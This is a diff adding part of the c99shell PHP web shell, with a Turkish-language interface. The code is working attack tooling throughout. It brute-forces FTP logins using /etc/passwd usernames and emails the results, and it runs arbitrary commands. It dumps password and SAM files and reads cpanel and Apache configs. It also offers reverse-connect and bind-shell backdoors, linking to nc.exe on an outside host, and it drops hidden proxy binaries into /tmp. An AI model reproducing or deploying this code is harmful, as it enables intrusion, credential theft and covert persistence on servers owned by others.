+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server Information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "</br><b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ �.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><b>Encoder:</b></br></br><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><br><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br><b>Hashes</b>:</br></br>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</br><b>Url:</b><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ </br></br><b>Base64:</b></br> base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly>";
+ echo "</br>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b></b></a>";
+ }
+ echo "</br></br><b>Base convertations</b>:</br></br>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></form>";
+}
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo("<b>Arka Kapi Girisi:</b></br></br><form name=form method=POST>Sunucu:<input type=text name=backconnectip size=15 value=$ip> Port No: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Baglan></form>Server ile baglanti kurmaniz icin M&#601;lumatsayarinizda <a href='http://www.g3n3t1x.by.ru/exploit/nc.exe'>nc.exe</a> ve acik bir port gerekir! Komutunuz; '<b>nc -l -n -v -p 5992</b>'<br><br>");
+ echo("$msg");
+ echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<b>Arka kapi yarat:</b></br></br><form name=form method=POST>
+Baglanti portu: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Yarat!'></form>");
+echo("$msg");
+echo("$emsg");
+}
+
+
+if ($act == "proxy") {
+ cf("/tmp/hantu.tgz",$proxy_shit);
+ ex("cd /tmp;tar -zxvf hantu.tgz");
+ ex("cd /tmp;cd .setan;chmod 777 xh");
+ ex("cd /tmp;cd .setan;chmod 777 httpd");
+ ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start");
+ checkproxyhost();
+ $msg = $_POST['proxyhostmsg'];
+ echo("$msg");
+ unlink("/tmp/hantu.tgz");
+ ex("cd /tmp; rm -r .setan"); 
+}
+
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Gone!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>".__FILE__." Adresindeki Shelli Sil!</br></br>Silmek icin yandaki kodu girin \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"Sil\"></form>";
+ }
+}
+if ($act == "search"){
+ echo "<b>Dosya Arama Sistemi:</b></br></br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>Dosya Bulunamadi</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>Dosya / Dizin Ismi: </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Nerde Arayalim:&nbsp;&nbsp; </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><b>Aranacak Kelimemi:</b>&nbsp;&nbsp;<input type=text name=\"search_text\" size=42 value=".htmlspecialchars($search_text).">
+
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Ara!\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"].". Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\".</br></br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  $execcmd = $_REQUEST['cmd'];
+  echo "Result Of Locally Executed Command: <b>$execcmd</b></br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder ".htmlspecialchars($d)."</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
